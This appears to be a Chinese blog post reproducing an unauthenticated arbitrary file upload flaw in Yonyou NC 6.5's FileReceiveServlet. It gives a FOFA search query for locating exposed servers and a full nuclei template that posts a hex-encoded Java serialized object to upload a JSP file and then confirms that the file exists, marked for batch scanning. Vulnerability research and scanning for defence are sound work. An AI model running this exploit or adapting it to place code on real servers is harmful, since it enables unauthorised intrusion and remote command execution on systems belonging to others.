用友NC FileReceiveServlet任意文件上传漏洞
漏洞简介
用友NC6.5的FileReceiveServlet接口,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
漏洞复现
fofa语法:app="用友-UFIDA-NC"
登录页面
POC:
访问上传后的文件
nuclei批量yaml文件
id: yonyou_NC_filereceiveservlet_fileupload
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
author: bjxsec
severity: critical
description: |
An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
metadata:
verified: true
max-request: 2
fofa-query: app="用友-UFIDA-NC"
tags: yonyou,file-upload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
file_content: "{{randstr}}"
http:
- raw:
- |
POST /servlet/FileReceiveServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
- |
GET /{{file_name}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200"
- "contains(body_2, '{{file_content}}')"
condition: and
# digest: 4a0a00473045022100dbda103ee05560f985e28b7ed7246cf8d1e4cf09da32a9d3b1645f86e5e14b740220651e7c2efef0e9014dc27f726ace13bb66b3e82e1f6d200ae08eb3c45cf1a35f:922c64590222798bb761d5b6d8e72950
分类:
漏洞复现 / 用友
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效